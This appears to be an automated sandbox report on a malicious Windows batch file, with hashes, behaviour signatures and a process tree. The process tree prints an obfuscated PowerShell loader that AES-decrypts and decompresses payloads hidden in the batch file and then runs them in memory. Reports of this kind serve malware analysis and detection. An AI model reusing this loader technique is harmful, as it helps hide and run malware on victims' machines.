Analysis
-
max time kernel
120s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
05/03/2025, 00:11
Static task
static1
Behavioral task
behavioral1
Sample
skibidigenesis.bat
Resource
win7-20240903-en
4 signatures
150 seconds
General
-
Target
skibidigenesis.bat
-
Size
397KB
-
MD5
72c4399da0d8899b4e60ba732d20ac70
-
SHA1
ff22be71d8e3be9473c711a997619804588c8dbc
-
SHA256
39532fe4477427729c951df53e455c6e67925adf3920138063e0064531ccc1c4
-
SHA512
58a928f109ae7a1ef307ca7babfe44ed218095d2bd7f4d637acf1d145be6d7fbb95d038d743c42b72f605c77fe5cbca603baca224e36e48e4c063ebb1b20a6df
-
SSDEEP
12288:1+WS3omtKVLLk59mhJi1GKIuVHhp3oPOLxc1jAFtr3kggy:QWBDLQ54kHjoP4iVobkggy
Score
8/10
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2816 powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2816 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2816 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 3028 wrote to memory of 2804 3028 cmd.exe 32 PID 3028 wrote to memory of 2804 3028 cmd.exe 32 PID 3028 wrote to memory of 2804 3028 cmd.exe 32 PID 3028 wrote to memory of 2816 3028 cmd.exe 33 PID 3028 wrote to memory of 2816 3028 cmd.exe 33 PID 3028 wrote to memory of 2816 3028 cmd.exe 33
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\skibidigenesis.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:3028 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0DhmhMNr65U2LjTJhoKpzIxw0wZqQLl/kh0GnMQQYjU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('UREvY15sxapeLe2YvOFrrw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $wdjfl=New-Object System.IO.MemoryStream(,$param_var); $IlgNN=New-Object System.IO.MemoryStream; $XkowE=New-Object System.IO.Compression.GZipStream($wdjfl, [IO.Compression.CompressionMode]::Decompress); $XkowE.CopyTo($IlgNN); $XkowE.Dispose(); $wdjfl.Dispose(); $IlgNN.Dispose(); $IlgNN.ToArray();}function execute_function($param_var,$param2_var){ $Xcfjm=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ZVfvM=$Xcfjm.EntryPoint; $ZVfvM.Invoke($null, $param2_var);}$Ktuyg = 'C:\Users\Admin\AppData\Local\Temp\skibidigenesis.bat';$host.UI.RawUI.WindowTitle = $Ktuyg;$mJVHb=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($Ktuyg).Split([Environment]::NewLine);foreach ($FoAar in $mJVHb) { if ($FoAar.StartsWith('lcdRYrvHHVkZCxwzUjvy')) { $ifSQW=$FoAar.Substring(20); break; }}$payloads_var=[string[]]$ifSQW.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "2⤵PID:2804
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2816
-